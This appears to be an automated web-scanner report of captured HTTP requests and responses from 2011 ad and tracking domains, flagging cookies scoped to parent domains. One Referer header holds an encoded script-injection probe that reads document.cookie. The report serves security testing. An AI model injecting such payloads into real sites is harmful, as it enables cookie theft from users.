HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 30 Jan 2011 01:30:06 GMT Connection: close Set-Cookie: UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 29-Jan-2013 01:30:06 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: boyle.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=9ff34bdc0b2e32fcc178bd49c46b26f9; expires=Sat, 25-Jan-2031 02:05:03 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1 Accept: */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: c.redcated Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Location: http://c.redacted/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.redacted%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&MUID=AD04D6F8B2FF44629973BD0674351135 Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/; Date: Sat, 29 Jan 2011 23:26:33 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?DI=15074 HTTP/1.1 Host: c.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/videos/results.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621031&D=1593447&AF=NOFORM; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178
Response
HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Location: http://c.redcated/c.gif?DI=15074&RedC=c.bing.com&MXFR=F741A5D3C8544F77A0B57D8439E7E06E Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; domain=.bing.com; expires=Thu, 18-Aug-2011 17:11:11 GMT; path=/; Date: Sun, 30 Jan 2011 17:11:10 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t.php?sc_project=1890207&resolution=1920&h=1200&camefrom=http%3A//news.ycombinator.com/news&u=http%3A//informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual&t=Information%20Arbitrage%20-%20Start%20Fund%3A%20No%20big%20deal.%20Business%20as%20usual.&java=1&security=9e00f8ff&sc_random=0.31911576888523996&sc_snum=1&invisible=1 HTTP/1.1 Host: c.statcounter.com Proxy-Connection: keep-alive Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:47:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR" Expires: Mon, 26 Jul 1997 05:00:00 GMT Set-Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0; expires=Fri, 29-Jan-2016 14:47:53 GMT; path=/; domain=.statcounter.com Content-Length: 49 Connection: close Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /calendar/calendar.aspx HTTP/1.1 Host: calendar.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353171&rver=6.1.6206.0&wp=MBI&wrep ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: careers.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 30 Jan 2011 02:06:11 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home Set-Cookie: MC1=V=3&GUID=da39980442014ca6b9da39619943b989; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=8EDD00D637154D4B841C122EB598FF5B; domain=.redacted; expires=Thu, 18-Aug-2011 02:06:11 GMT; path=/ Cache-Control: no-cache Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /APM/go/139941180/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.meaningfulbeauty.com/?uci=US-MT-O-DI-MI-2906 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353263-3972457; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=7E5205F6A748400B84AD01F34006AE37; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/285d4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=b882065/285d4/10e4d581/bab9/4d44c7ef; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:43 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /APM/go/148848786/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=DA936173-6614-470C-8AAF-8DD52E3643E8 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353265-3982025; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=5DEF820424F84B24B69D3D93ECECB25F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bce8f84/1a43a/11174245/bab9/4d44c7f1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:45 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BEL/go/262582811/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353269-3932791; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=CE711711131C4C8D81F8D0F57B52D165; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7f5; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:48 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CNT/go/286609711/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353204-3934536; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=B03CF75FE18B4C4488D98A18A160243C; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7b4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:06:43 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CNT/go/287065754/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353207-3943143; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=3467FF0EC8A04BA6ADED05C9CB0F7837; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7b7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:06:46 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CNT/go/299297287/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296344744-9189356; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=ADE9FC21333E46488D7A7ABFE892B219; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a8; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:45:43 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /NFX/go/297941249/direct/01/ HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.netflix.com/opdply?mqso=80028841 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296344741-9183539; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=911C5A9886C74D1D85E6D49FC8A33620; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c4e; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bf3b0a8/1c4e/11c23901/bab9/4d44a6a5; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:45:40 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ULA/go/296652509/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296350513-3979227; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=27C92A747D6B4A87B8366284DD8E4677; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 01:21:53 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/286026710/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.ishares.com/home.htm&c=MSN P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296350513-3980097; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=2652D8E3C448492EBAA5519D4E847438; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=4bd5098/1c5b3/110c6bd6/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 01:21:53 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/286609711/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353255-3938625; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=9B933D979CFB4CC081B176EF97E8AAD9; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7e7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:35 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/287065754/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353257-3947053; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=CDB74D90C77343EFBA0AEB977000E321; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7e9; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:36 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/296652509/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296350513-3979647; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=93E807CC859C4B04A5E7B8BADD66DD24; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 01:21:52 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /goiframe/184054348/262582811/direct/01 HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353210-3953580; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=C399BF76ECC4498AABC770564CEE637F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7ba; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:06:50 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /goiframe/199711109/299297287/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296344745-9193135; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=B310B20DA83E464695664804CCAE6E71; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a9; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:45:45 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666 HTTP/1.1 Host: context3.kanoodle.com Proxy-Connection: keep-alive Referer: http://www.newsvine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 15:05:02 GMT Server: Barista/1.1-(eanhbg) Connection: Close Content-Length: 3242 Content-Type: text/html P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: vi_1.011=129639990201622008000000106049048; domain=.kanoodle.com; path=/; expires=Mon, 30-Jan-2012 15:05:02 GMT Set-Cookie: fc_ms_1.3=AA; domain=.kanoodle.com; path=/; expires=Sun, 06-Feb-2011 15:05:02 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601 HTTP/1.1 Host: conveu.admailtiser.com Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFgeo=5386156;expires=Sun, 29 Jan 2012 23:16:32 GMT;domain=.zedo.com;path=/;
FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: deals.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
